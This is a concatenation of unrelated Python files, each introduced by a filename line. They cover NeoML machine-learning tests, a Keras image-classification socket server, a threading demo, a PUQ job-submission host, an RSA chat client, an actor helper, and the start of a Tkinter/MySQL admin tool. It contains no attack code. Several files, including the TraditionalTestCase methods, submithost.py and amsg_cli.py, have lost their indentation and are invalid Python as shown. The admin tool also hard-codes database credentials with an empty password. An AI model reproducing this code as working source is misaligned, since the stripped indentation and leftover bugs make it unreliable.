        self._test_loss('BinaryFocalLoss', dict(force=6.6, loss_weight=7.7),
            last_loss=0.)
    def test_center_loss(self):
        """CenterLoss with integer labels and 3 classes."""
        self._test_loss('CenterLoss',
            dict(rate=6.6, loss_weight=7.7, class_count=3),
            last_loss=1.,
            labels_type=np.int32)
    def test_multihinge_loss(self):
        """MultiHingeLoss smoke test."""
        self._test_loss('MultiHingeLoss', dict(loss_weight=7.7), last_loss=0.)
    def test_multisquaredhinge_loss(self):
        """MultiSquaredHingeLoss smoke test."""
        self._test_loss('MultiSquaredHingeLoss', dict(loss_weight=7.7), last_loss=0.)
class DnnTestCase(MultithreadedTestCase):
    """Dnn container behavior: checkpointing, solvers, initializers, math engines."""
    def test_load_store(self):
        """Store a checkpoint and reload it; solver type and layer counts survive."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        dnn.solver = neoml.Dnn.AdaptiveGradient(math_engine)
        source = neoml.Dnn.Source(dnn, "source")
        argmax = neoml.Dnn.Argmax(source, name="argmax")
        sink = neoml.Dnn.Sink(argmax, "sink")
        # Was assertTrue(len(...), N): the count was silently treated as the
        # `msg` argument and never compared. Use assertEqual.
        self.assertEqual(len(dnn.input_layers), 1)
        self.assertEqual(len(dnn.layers), 3)
        self.assertEqual(len(dnn.output_layers), 1)
        # `dir` shadowed the builtin; renamed the local.
        tmp_dir = tempfile.mkdtemp()
        path = os.path.join(tmp_dir, 'dnn.arc')
        dnn.store_checkpoint(path)
        dnn_loaded = neoml.Dnn.Dnn(math_engine)
        dnn_loaded.load_checkpoint(path)
        os.remove(path)
        os.rmdir(tmp_dir)
        self.assertTrue(isinstance(dnn_loaded.solver, neoml.Dnn.AdaptiveGradient))
        self.assertEqual(len(dnn_loaded.input_layers), 1)
        self.assertEqual(len(dnn_loaded.layers), 3)
        self.assertEqual(len(dnn_loaded.output_layers), 1)
    def test_solver(self):
        """The solver property accepts each gradient solver type."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        dnn.solver = neoml.Dnn.NesterovGradient(math_engine)
        self.assertTrue(isinstance(dnn.solver, neoml.Dnn.NesterovGradient))
        dnn.solver = neoml.Dnn.AdaptiveGradient(math_engine)
        self.assertTrue(isinstance(dnn.solver, neoml.Dnn.AdaptiveGradient))
        dnn.solver = neoml.Dnn.SimpleGradient(math_engine)
        self.assertTrue(isinstance(dnn.solver, neoml.Dnn.SimpleGradient))
    def test_initializer(self):
        """The initializer property accepts Xavier and Uniform initializers."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        random = neoml.Random.Random(0)
        dnn = neoml.Dnn.Dnn(math_engine, random)
        dnn.initializer = neoml.Dnn.Xavier(random)
        self.assertTrue(isinstance(dnn.initializer, neoml.Dnn.Xavier))
        dnn.initializer = neoml.Dnn.Uniform()
        self.assertTrue(isinstance(dnn.initializer, neoml.Dnn.Uniform))
    def test_math_engine(self):
        """The math_engine property reports the engine the net was built with."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        self.assertTrue(isinstance(dnn.math_engine, neoml.MathEngine.CpuMathEngine))
    def test_default_math_engine(self):
        """A blob can be copied onto the default math engine with data intact."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        data = [1, 2]
        first_blob = neoml.Blob.asblob(math_engine, np.array(data, dtype=np.int32), (2, 1, 1, 1, 1, 1, 1))
        second_blob = first_blob.copy(neoml.MathEngine.default_math_engine())
        self.assertEqual(second_blob.batch_len, 2)
        self.assertEqual(list(second_blob.asarray()), data)
    def test_properties(self):
        """input_layers/layers/output_layers report the expected counts."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source")
        argmax = neoml.Dnn.Argmax(source, name="argmax")
        sink = neoml.Dnn.Sink(argmax, "sink")
        # Was assertTrue(len(...), N) — same msg-argument bug as test_load_store.
        self.assertEqual(len(dnn.input_layers), 1)
        self.assertEqual(len(dnn.layers), 3)
        self.assertEqual(len(dnn.output_layers), 1)
class TraditionalTestCase(MultithreadedTestCase):
def test_differential_evolution(self):
from neoml.DifferentialEvolution import IntTraits, DoubleTraits, DifferentialEvolution
def func(vec):
return sum([x**2 for x in vec])
for dim, param_traits, max_gen_count, result_traits, population in (
(1, None, None, None, 50),
(10, [IntTraits()] * 5 + [DoubleTraits()] * 5, 10, DoubleTraits(), 100),
):
diff_evo = DifferentialEvolution(func, [-5] * dim, [5] * dim,
param_traits=param_traits, result_traits=result_traits,
max_generation_count=max_gen_count, population=population)
diff_evo.build_next_generation()
diff_evo.run()
self.assertEqual(diff_evo.build_next_generation(), True)
res_population = np.array(diff_evo.population)
self.assertEqual(res_population.shape, (population, dim))
eval_population = np.array(diff_evo.population_function_values)
self.assertEqual(eval_population.shape, (population,))
optimal_vector = np.array(diff_evo.optimal_vector)
self.assertEqual(optimal_vector.shape, (dim,))
def _test_classification_model(self, model, params, is_binary=False):
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
val = 1 if is_binary else 3
y = val * np.ones(20, dtype=np.int32)
if not is_binary: # every class should be represented in dataset
for i in range(3):
y[i] = i
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
classifier = model(**params).train(X, y, weight)
pred = classifier.classify(X[-3:])
print(pred, np.argmax(pred))
self.assertTrue(np.equal(np.argmax(pred), [val, val, val]).all())
def _test_regression_model(self, model, params):
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
y = np.ones(20, dtype=np.int32)
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
regressor = model(**params).train(X, y, weight)
pred = regressor.predict(X[0:3])
self.assertEqual(pred.shape, (3,))
def test_gradient_boosting_classification(self):
for loss, builder_type, thread_count, is_binary in itertools.product(
('binomial', 'exponential', 'squared_hinge', 'l2'),
('full', 'hist', 'multi_full', 'multi_hist'), (1, 4), (False, True)):
self._test_classification_model(neoml.GradientBoost.GradientBoostClassifier,
dict(loss=loss, iteration_count=10, builder_type=builder_type, thread_count=thread_count),
is_binary=is_binary)
def test_gradient_boosting_regression(self):
for builder_type, thread_count in itertools.product(('full', 'hist'), (1, 4)):
self._test_regression_model(neoml.GradientBoost.GradientBoostRegressor,
dict(iteration_count=10, builder_type=builder_type, thread_count=thread_count))
def test_decision_tree_classification(self):
for criterion, is_binary in itertools.product(('gini', 'information_gain'), (False, True)):
self._test_classification_model(neoml.DecisionTree.DecisionTreeClassifier,
dict(criterion=criterion), is_binary=is_binary)
for multiclass_mode in ('single_tree', 'one_vs_all', 'one_vs_one'):
self._test_classification_model(neoml.DecisionTree.DecisionTreeClassifier, dict(multiclass_mode=multiclass_mode))
def test_svm_classification(self):
for kernel, thread_count, is_binary in itertools.product(('linear', 'poly', 'rbf', 'sigmoid'),
(1, 4), (False, True)):
self._test_classification_model(neoml.SVM.SvmClassifier,
dict(kernel=kernel, thread_count=thread_count), is_binary=is_binary)
for multiclass_mode in ('one_vs_all', 'one_vs_one'):
print('svm ', multiclass_mode)
self._test_classification_model(neoml.SVM.SvmClassifier, dict(multiclass_mode=multiclass_mode))
def test_linear_classification(self):
for loss, thread_count, is_binary in itertools.product(('binomial', 'squared_hinge', 'smoothed_hinge'),
(1, 4), (False, True)):
self._test_classification_model(neoml.Linear.LinearClassifier,
dict(loss=loss, thread_count=thread_count), is_binary=is_binary)
for multiclass_mode in ('one_vs_all', 'one_vs_one'):
self._test_classification_model(neoml.Linear.LinearClassifier, dict(multiclass_mode=multiclass_mode))
def test_linear_regression(self):
for thread_count in (1, 4):
self._test_regression_model(neoml.Linear.LinearRegressor,
dict(thread_count=thread_count))
def test_cross_validation_score(self):
from neoml.CrossValidation import cross_validation_score
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
y = np.ones(20, dtype=np.int32)
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
for classifier, score in itertools.product(
( neoml.Linear.LinearClassifier(),
neoml.GradientBoost.GradientBoostClassifier(),
neoml.SVM.SvmClassifier(),
neoml.DecisionTree.DecisionTreeClassifier()
), ('accuracy', 'f1')):
cv_score = cross_validation_score(classifier, X, y, weight, score, 5)
self.assertEqual(cv_score.shape, (5,))
def test_load_store(self):
dir = tempfile.mkdtemp()
for model_init, model_result in (
(neoml.DecisionTree.DecisionTreeClassifier, neoml.DecisionTree.DecisionTreeClassificationModel),
(neoml.GradientBoost.GradientBoostRegressor, neoml.GradientBoost.GradientBoostRegressionModel)):
path = os.path.join(dir, 'test')
pickled = model_init().train([[1]], [1])
with open(path, 'wb') as file:
pickle.dump(pickled, file)
with open(path, 'rb') as file:
loaded = pickle.load(file)
self.assertEqual(type(loaded), model_result)
os.remove(path)
os.rmdir(dir)
class ClusteringTestCase(MultithreadedTestCase):
    """Smoke tests for the neoml.Clustering algorithms on a toy dataset."""
    def _test_clusterize(self, method, params=None):
        """Run the named clustering algorithm on dense, list and sparse inputs.

        Fix: ``params`` defaulted to a mutable ``{}``; replaced with the
        None-sentinel idiom.
        """
        params = {} if params is None else params
        X_dense = np.eye(20, 5, dtype=np.float32)
        X_dense_list = X_dense.tolist()
        X_sparse = sparse.csr_matrix(X_dense)
        weight = np.ones(20, dtype=np.float32)
        method = getattr(neoml.Clustering, method)(**params)
        for X in (X_dense, X_dense_list, X_sparse):
            clusters = method.clusterize(X, weight)
            # One label per sample; the other two results have one column per
            # feature (presumably centers and per-cluster spread - TODO confirm).
            self.assertEqual(clusters[0].shape, (20,))
            self.assertEqual(clusters[1].shape[1], 5)
            self.assertEqual(clusters[2].shape[1], 5)
    def test_first_come(self):
        self._test_clusterize('FirstCome', dict(threshold=0.01))
    def test_hierarchical(self):
        self._test_clusterize('Hierarchical', dict(max_cluster_distance=2, min_cluster_count=6))
    def test_iso_data(self):
        self._test_clusterize('IsoData', dict(init_cluster_count=6, max_cluster_count=10,
            min_cluster_size=1, max_iteration_count=10, min_cluster_distance=0.1,
            max_cluster_diameter=2, mean_diameter_coef=2))
    def test_kmeans(self):
        self._test_clusterize('KMeans', dict(max_iteration_count=100, cluster_count=6, init='k++'))
|
server.py | '''
Assignment 2
Server for image classification
Author: fanconic
'''
import base64
from threading import Thread
from queue import Queue
from PIL import Image
import socket, json
from keras.preprocessing import image
from keras.applications.resnet50 import ResNet50, preprocess_input, decode_predictions
from io import BytesIO
import numpy as np
import time
# Work queue shared between the accept loop and the classification worker.
queue = Queue()
PORT = 50002           # TCP port the server listens on
ADDRESS = 'localhost'  # bind address (loopback only)
# Listen for incoming connections
def main_thread():
    """Accept loop: hand every accepted client socket to the worker queue."""
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Fix: without SO_REUSEADDR a quick restart fails with
    # "Address already in use" while the old socket is in TIME_WAIT.
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Bind socket to localhost
    server_socket.bind((ADDRESS, PORT))
    # Listen for incoming connections from clients (backlog of 10)
    server_socket.listen(10)
    while True:
        # Hand each accepted connection to the worker thread via the queue.
        (client_socket, address) = server_socket.accept()
        queue.put(client_socket)
# Receive data from clients, decode, and feed into neural network
def second_thread():
    """Worker loop: pull a client socket off the queue, read one base64
    image message, classify it with ResNet50 and send back the top-5
    predictions as JSON terminated by '##END##'."""
    # ResNet50 model and predictions (weights fetched on first use)
    model = ResNet50(weights='imagenet')
    while True:
        client_socket = queue.get()
        # Receive TCP and check with end string, if everything has arrived.
        # NOTE(review): if the client disconnects before sending '##END##',
        # recv() returns b'' forever and this inner loop never exits.
        # NOTE(review): decoding each 1024-byte chunk separately can split a
        # multi-byte UTF-8 sequence; decoding once after the loop would be safer.
        data = ''
        while True:
            part = client_socket.recv(1024)
            data += part.decode('utf-8')
            if '##END##' in data:
                break
        # Load the JSON payload after stripping the end marker
        data = data.replace('##END##', '')
        data = json.loads(data)
        # Get variables from dict
        chat_id = data['chat_id']
        encoded_image = data['encoded_image']
        img = base64.b64decode(encoded_image)
        # Convert picture from bytes to image
        # https://www.programcreek.com/python/example/89218/keras.preprocessing.image.img_to_array
        img = Image.open(BytesIO(img))
        # Keras ResNet50 uses 224 x 224 images
        img = img.resize((224,224))
        # Write the picture to an array
        X = image.img_to_array(img)
        # Adding additional axis (batch dimension of 1)
        X = np.expand_dims(X, axis=0)
        # Preprocess the input
        X = preprocess_input(X)
        pred = model.predict(X)
        pred = decode_predictions(pred)
        # Keep the top-5 (label, probability) pairs
        predictions = []
        for i in range (5):
            predictions.append({'Label': pred[0][i][1], 'Probability': str(pred[0][i][2])})
        # prepare data to be sent back
        data = {
            'chat_id': chat_id,
            'predictions': predictions
        }
        data = json.dumps(data) + '##END##'
        try:
            # Send back data
            client_socket.sendall(data.encode('utf-8'))
        finally:
            # Close socket
            client_socket.close()
if __name__ == "__main__":
Thread(target= main_thread).start()
Thread(target= second_thread).start()
while True:
time.sleep(10)
|
Event_test.py | # coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
import time
# Event shared by the worker threads and the main thread.
event = threading.Event()

def cal(name):
    """Block on the shared event, then announce that work may start.

    Fix: uses the modern ``current_thread().name`` API;
    ``currentThread()`` / ``getName()`` are deprecated camelCase aliases.
    """
    # Wait on the event - the thread blocks here until event.set() fires.
    print('%s 启动' % threading.current_thread().name)
    print('%s 准备开始计算状态' % name)
    event.wait()  # ①
    # The event fired - resume running.
    print('%s 收到通知了.' % threading.current_thread().name)
    print('%s 正式开始计算!'% name)
# Create and start two threads; both block at mark ① until the event fires.
threading.Thread(target=cal, args=('甲', )).start()
threading.Thread(target=cal, args=("乙", )).start()
time.sleep(2) #② give both threads time to reach event.wait()
print('------------------')
# Fire the event: wakes every thread waiting on it.
print('主线程发出事件')
event.set() |
submithost.py | """
This file is part of PUQ
Copyright (c) 2013 PUQ Authors
See LICENSE file for terms.
"""
from __future__ import absolute_import, division, print_function
import os, time, sys
from .monitor import TextMonitor
from subprocess import Popen, PIPE
import numpy as np
from logging import debug
from .hosts import Host
from shutil import rmtree
from stat import S_ISDIR
from glob import glob
from threading import Thread, Event
class SubmitHost(Host):
"""
Create a host object that uses the hub submit command.
Args:
cpus: Number of cpus each process uses. Default=1.
cpus_per_node: How many cpus to use on each node. Default=1.
"""
def __init__(self, venue=None, cpus=1, cpus_per_node=1, walltime=60):
Host.__init__(self)
self.cpus = cpus
self.cpus_per_node = cpus_per_node
self.hostname = venue
self.jobs = []
# Creates a CSV file compatible with the HubZero submit command
def add_jobs(self, fname, args):
import shlex
self.fname = fname
first = True
try:
os.mkdir(fname)
except:
pass
f = open(os.path.join(fname, 'input.csv'), 'w')
for a in args:
if first:
first = False
print(', '.join(['@@'+b[0] for b in a]), file=f)
cmds = [(x[0], '@@'+x[0]) for x in a]
print(','.join([str(b[1]) for b in a]), file=f)
f.close()
venue == ''
if self.hostname is not None:
if self.hostname == 'local':
venue = '--local'
else:
venue = '--venue %s' % self.hostname
scmd = "submit %s --runName=puq -d input.csv %s" % (venue, self.prog.cmd(cmds))
self.add_job(shlex.split(scmd), '', 0, '')
# run, monitor and status return
# True (1) is successful
# False (0) for errors or unfinished
def run(self):
""" Run all the jobs in the queue """
self._running = []
self._monitor = TextMonitor()
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
err = self._run()
os.chdir(cwd)
if err == False:
rmtree(self.fname, ignore_errors=True)
try:
os.remove(self.fname+'.hdf5')
except:
pass
return False
return True
def peg_parse(self):
# parse the contents of the pegasusstatus.txt file
done = 0
filename = 'pegasusstatus.txt'
with open(filename) as f:
for line in f:
if line.startswith('%DONE'):
done = float(line.split()[1])
break
return done
    def status_monitor(self):
        # Watch pegasusstatus.txt for status changes.
        # This could possibly be done more efficiently
        # using filesystem notification but in practice
        # this turned out to be more reliable across
        # different OS versions.
        #
        # NOTE(review): the bare excepts below swallow every error; they are
        # presumably intentional since missing files/directories are expected
        # while Pegasus starts up - confirm before narrowing.
        found = False
        # Poll until the Pegasus work directory appears (or we are stopped).
        while not found and not self.stop.is_set():
            try:
                os.chdir('puq/work')
                found = True
            except:
                self.stop.wait(10)
        done = -1
        # Poll the status file every 10s, emitting a Rappture progress line
        # whenever the %DONE percentage increases; stop once it reaches 100.
        while not self.stop.is_set():
            try:
                d = self.peg_parse()
            except:
                # Parse failure: keep the last known progress value.
                d = done
            if d > done:
                print('=RAPPTURE-PROGRESS=>%d Running' % (int(d)))
                sys.stdout.flush()
                done = d
            if int(d) >= 100:
                self.stop.set()
            else:
                self.stop.wait(10)
def _run(self):
j = self.jobs[0]
print('=RAPPTURE-PROGRESS=>0 Starting')
sys.stdout.flush()
try:
myprocess = Popen(j['cmd'], bufsize=0)
except Exception as e:
print('Command %s failed: %s' % (' '.join(j['cmd']), e))
sys.stdout.flush()
self.stop = Event()
p2 = Thread(target=self.status_monitor)
p2.daemon = True
p2.start()
# wait for command to finish
err = True
try:
ret = myprocess.wait()
if ret:
err = False
print('Submit failed with error %s' % ret)
whocares = os.listdir(os.getcwd())
if os.path.exists('puq'):
fn = glob('puq/*.stderr')
if fn:
with open(fn[0]) as f:
print(f.read())
sys.stdout.flush()
except KeyboardInterrupt:
print('\nPUQ interrupted. Cleaning up. Please wait...\n')
err = False
myprocess.kill()
j['status'] = 'F'
self.stop.set()
if p2 and p2.is_alive():
p2.join()
return err
    # Collect the data from individual stdout and stderr files into
    # the HDF5 file. Remove files when finished.
    def collect(self, hf):
        """Move per-job stdout/stderr/output files from the puq work tree
        into the open HDF5 handle *hf*; returns the list of finished job
        numbers and removes the job directory afterwards."""
        # Collect results from output files
        debug("Collecting")
        cwd = os.path.abspath(os.getcwd())
        os.chdir(self.fname)
        hf.require_group('output')
        jobs_grp = hf.require_group('output/jobs')
        # find the jobs that are completed and, if the stdout/stderr files are there,
        # move them to hdf5
        finished_jobs = []
        os.chdir('puq')
        # Get the job stats. Do this in a loop because it looks like
        # sometimes this code gets run before pegasus generates the file.
        tries = 2
        while tries > 0:
            try:
                # NOTE(review): dtype='string' is a Python-2-era alias that
                # newer NumPy releases reject - confirm before upgrading NumPy.
                data = np.genfromtxt('pegasusjobstats.csv', usecols=(2,3,4,7,15,16), dtype='string',
                    skip_header=26, comments='#', delimiter=',')
                tries = 0
            except:
                tries -= 1
                if tries > 0:
                    time.sleep(30)
        job = {}
        # Map job-name suffix -> (try, site, time, exitcode, host); local jobs skipped.
        for j, _try, site, _time, exitcode, host in data:
            if site == 'local':
                continue
            j = j[j.rfind('_')+1:]
            job[j] = (int(_try), site, float(_time), int(exitcode), host)
        times = np.empty((len(job)))
        for j in job:
            jobnum = int(j)-1
            times[jobnum] = job[j][2]
            finished_jobs.append(jobnum)
            if not S_ISDIR(os.stat(j).st_mode):
                print("ERROR: job %s directory not found" % j)
                continue
            os.chdir(j)
            grp = jobs_grp.require_group(str(jobnum))
            # Copy the job's stdout and stderr into its HDF5 group.
            for ext in ['out', 'err']:
                outfile = glob('*.std%s' % ext)
                if outfile:
                    f = open(outfile[0], 'r')
                    fdata = f.read()
                    grp.create_dataset('std%s' % ext, data=fdata)
                    if job[j][3] != 0:
                        # error code was set
                        print("ERROR: Job %s failed: %s" % (j, fdata))
                    f.close()
            # Declared output files are copied in too; missing ones are
            # silently skipped (bare except kept from the original).
            for fn in self.prog.outfiles:
                try:
                    f = open(fn, 'r')
                    grp.create_dataset(fn, data=f.read())
                    f.close()
                except:
                    pass
            os.chdir('..')
        if 'time' in jobs_grp:
            del jobs_grp['time']
        jobs_grp['time'] = times
        os.chdir(cwd)
        rmtree(self.fname)
        return finished_jobs
|
amsg_cli.py | #!env/bin/python3
import sys
import socket
import threading
import time
import signal
import argparse
import sqlite3
import parser
import rsa
import socks
class client:
def __init__(self,ip='localhost',port='9999',mode='0'):
#just to support srv variable
self.clients = 1
self.srv_info = [(ip,port)]
self.name = input("Enter you username for session:")
self.pubkey,self.privkey = rsa.newkeys(1024)
if(mode=='tor'):
self.cli = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
self.cli.set_proxy(socks.SOCKS5,"localhost",9050)
elif(mode=='0'):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.cli.connect((ip,port))
except socket.gaierror as e:
print("Error:",e)
self.cli.close()
sys.exit(1)
signal.signal(signal.SIGINT, self.sighandler)
def sighandler(self, signum, frame):
print("Shutting down connection")
self.cli.close()
sys.exit(0)
def snd_msg(self, msg):
try:
msg = rsa.encrypt(msg.encode('utf-8'),self.srv_info[2])
x = self.cli.send(msg)
return 1
except socket.error as e:
print("Error:",e)
self.cli.close()
sys.exit(1)
    def rcv_msg(self,name):
        """Receive loop: decrypt each incoming message with our private key
        and log it into the ``chat`` table of amsg.db.

        NOTE(review): a new sqlite connection is opened per message and never
        closed, and a clean remote shutdown (recv() returning b'') is not
        detected - the loop then spins on empty reads.
        """
        while True:
            try:
                data = self.cli.recv(1024)
                if(len(data)!=0):
                    msg = rsa.decrypt(data,self.privkey)
                    msg = msg.decode('utf-8')
                    con2 = sqlite3.connect('amsg.db')
                    cur2 = con2.cursor()
                    cur2.execute('insert into chat(sender,msg,time) values(?,?,?)',(name,msg,time.ctime(time.time())))
                    con2.commit()
            except socket.error as e:
                print("Error:",e)
                self.cli.close()
                print("connection closed ):")
                return
            except KeyboardInterrupt:
                return 1
    def rcv_info(self):
        """Read the server's handshake ("name,n,e"), record the server in
        the ``User`` table of amsg.db and return the three fields.

        Returns (name, n, e) as strings on success; implicitly returns None
        if nothing was received or an error occurred, so callers that
        unpack the result will then raise.
        """
        try:
            data = self.cli.recv(1024)
            if(len(data)!=0):
                data = str(data.decode('utf-8'))
                data = data.split(',')
                name = data[0]
                #srv_pubk = rsa.PublicKey(int(data[1]),int(data[2]))
                try:
                    con = sqlite3.connect('amsg.db')
                    cur = con.cursor()
                    cur.execute('insert into User(username,ip,status,join_time) values(?,?,?,?)',(name,self.srv_info[0][0],1,time.ctime(time.time())))
                    con.commit()
                    con.close()
                    print(name, "stored in db")
                    return data[0],data[1],data[2]
                except sqlite3.Error as e:
                    print("Error with in db:",e)
                    self.cli.close()
        except socket.error as e:
            print("Error occured",e,"No connecton established with",self.srv_info[0])
            self.cli.close()
def snd_info(self):
n = str(self.pubkey.n)
e = str(self.pubkey.e)
info = self.name+','+n+','+e
try:
self.cli.send(info.encode('utf-8'))
except socket.error as e:
print("Error with server:",e)
self.cli.close()
sys.exit(0)
return 1
# Script entry: connect, exchange handshakes, then receive in a background thread.
# NOTE(review): ``parser`` was imported as a module above; unless a local
# parser.py defines ip/port/mode attributes, this resolves to the *stdlib*
# parser module and fails with AttributeError - confirm which is intended.
X = client(parser.ip, parser.port,parser.mode)
try:
    # rcv_msg from srv
    (name,n,e) = X.rcv_info()
    srv_pubk = rsa.PublicKey(int(n),int(e))
    # srv_info becomes [(ip, port), name, public_key]; snd_msg reads index 2.
    X.srv_info.append(name)
    X.srv_info.append(srv_pubk)
    #snd info for srv
    p = X.snd_info()
    if (p and name):
        print("Connection successful with server")
    else:
        print("error")
    thread = threading.Thread(target=X.rcv_msg, args=[name])
    thread.start()
except Exception as E:
    print(E)
    print("Error occured within thread")
    sys.exit(1)
|
__init__.py | import multiprocessing
from pkg_resources import get_distribution, DistributionNotFound
try:
    # Resolve the installed package version from setuptools metadata.
    # NOTE(review): pkg_resources is deprecated in favour of
    # importlib.metadata - confirm the minimum Python before switching.
    __version__ = get_distribution(__name__).version
except DistributionNotFound:
    # package is not installed
    pass
class Actor:
    """
    Wraps a pickleable class as an actor to run in a dedicated process.
    The returned Actor instance has a .proxy attribute that should be used
    to invoke the methods of the wrapped class.
    """
    # Fix: the docstring above originally appeared *after* this attribute,
    # so it was a stray string expression and Actor.__doc__ was None.
    # Sentinel task name telling the actor loop to shut down.
    __close_message__ = '_*CLOSE*_'

    def __init__(self, actor_instance):
        """Spawn the actor process around *actor_instance* and build a proxy
        exposing its public callables."""
        # Initialize a queue that can be shared across processes
        manager = multiprocessing.Manager()
        self.queue = manager.Queue()
        # Give the wrapped instance a way to schedule calls on itself.
        setattr(actor_instance, 'enqueue', EnqueueDirectCall(self.queue))
        self.actor_process = multiprocessing.Process(target=self.__run_actor__, args=(self.queue, actor_instance))
        self.actor_process.start()
        # Build the proxy: one queue-writing callable per public method.
        self.proxy = Proxy()
        for attr in dir(actor_instance.__class__):
            if callable(getattr(actor_instance, attr)) and not attr.startswith('__'):
                setattr(self.proxy, attr, EnqueueNamedCall(self.queue, attr))

    def close(self):
        """ Closes the actor process """
        self.queue.put_nowait((self.__close_message__,))

    def join(self):
        """ Joins the calling thread to the process for the actor. """
        self.actor_process.join()

    def __run_actor__(self, queue, actor_instance):
        """ Runs the actor process by reading from the queue and executing serially. """
        while True:
            task = queue.get()  # Will block until a task is available
            name = task[0]
            if name == self.__close_message__:
                return
            target = getattr(actor_instance, name)
            if len(task) > 1:
                args = task[1]
                target(*args)
            else:
                target()
class Proxy:
    """Empty attribute bag: Actor attaches one queue-writing callable per
    wrapped public method onto an instance of this class."""
class EnqueueNamedCall:
    """Callable that enqueues ``(name, args)`` tuples onto a queue.

    ``name`` is fixed at construction time; ``args`` are whatever
    positional arguments each call receives.
    """
    def __init__(self, queue, name):
        self.queue = queue
        self.name = name

    def __call__(self, *args):
        self.queue.put_nowait((self.name, args))
class EnqueueDirectCall:
    """Callable that enqueues ``(target.__name__, args)`` for an explicit
    callable target supplied on every call (used by the wrapped instance
    to schedule work on itself)."""
    def __init__(self, queue):
        self.queue = queue

    def __call__(self, callable_target, *args):
        self.queue.put_nowait((callable_target.__name__, args))
|
Admin.py | from tkinter import *
from tkinter import ttk
from tkinter import tix
from tkinter import filedialog
from tkscrolledframe import ScrolledFrame
from ttkwidgets import CheckboxTreeview
from math import *
from platform import *
from tkinter import messagebox
from datetime import *
import mysql.connector
import threading
import pandas as pd
from random import randint
class Database_Server():
    # Thin wrapper around the MySQL connection used by the admin UI.
    def connection_database(self):
        # Opens the connection and a cursor; sets self.bancoConnect so the
        # UI can tell whether the database is reachable.
        # NOTE(review): host/database/user are hard-coded and the password
        # is empty - credentials should come from configuration, not source.
        try:
            self.bancoServer = mysql.connector.connect(
                host='10.0.0.65',
                database='empresa_funcionarios',
                user='MultimoldesAdmin',
                password='')
            self.bancoServer.autocommit = True
            self.cursor = self.bancoServer.cursor()
            self.bancoConnect = True
        except Exception as erro:
            print(f'{erro}, {(erro.__class__)}')
            self.bancoConnect = False
    def encerrando_conexao_database(self):
        # Shuts the connection down.
        # NOTE(review): the connection is closed before its cursor; most
        # drivers tolerate this, but cursor-first is the safer order.
        self.bancoServer.close()
        self.cursor.close()
class Funcs():
def verificar_campos_cadastro(self, parametro):
#Atribuição dos campos cadastrais nas variáveis
a = self.campoNome.get()
b = self.campoCPF.get()
c = self.campoSenha.get()
d = self.campoConfirmaSenha.get()
e = self.campoFuncao.get()
f = self.campoFone.get()
g = self.campoNasc.get()
#Verificando se algum campo não foi preenchido
if a == '' or b == '' or c == '' or d == '' or e == 'Selecione' or f == '' or g == '' or self.box1.get() == '' or self.box2.get() == '' or self.box3.get() == '' or self.box4.get() == '' or self.box5.get() == '' or self.box6.get() == '' or self.box7.get() == '' or self.box8.get() == '' or self.box9.get() == '' or self.box10.get() == '' or self.box11.get() == '' or self.box12.get() == '' or self.box13.get() == '' or self.box14.get() == '' or self.box15.get() == '' or self.box16.get() == '' or self.box17.get() == '' or self.box18.get() == '' or self.box19.get() == '' or self.box20.get() == '' or self.box21.get() == '' or self.box22.get() == '' or self.box23.get() == '' or self.box24.get() == '' or self.box25.get() == '' or self.box26.get() == '' or self.box27.get() == '' or self.box28.get() == '' or self.box29.get() == '' or self.box30.get() == '' or self.box31.get() == '' or self.box32.get() == '' or self.box33.get() == '' or self.box34.get() == '' or self.box35.get() == '' or self.box36.get() == '' or self.box37.get() == '' or self.box38.get() == '' or self.box39.get() == '' or self.box40.get() == '' or self.box41.get() == '':
#Mudando cor para preto caso o usuário tenha errado em algum campo e tenha corrigdo
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbFuncao['fg'] = '#4c78ff'
self.lbFone['fg'] = '#4c78ff'
self.lbNasc['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoFone['bg'] = 'white'
self.campoNasc['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
self.lbAtribuicao1['fg'] = '#4c78ff'
self.lbAtribuicao2['fg'] = '#4c78ff'
self.lbAtribuicao3['fg'] = '#4c78ff'
self.lbAtribuicao4['fg'] = '#4c78ff'
self.lbAtribuicao5['fg'] = '#4c78ff'
self.lbAtribuicao6['fg'] = '#4c78ff'
self.lbAtribuicao7['fg'] = '#4c78ff'
self.lbAtribuicao8['fg'] = '#4c78ff'
self.lbAtribuicao9['fg'] = '#4c78ff'
self.lbAtribuicao10['fg'] = '#4c78ff'
self.lbAtribuicao11['fg'] = '#4c78ff'
self.lbAtribuicao12['fg'] = '#4c78ff'
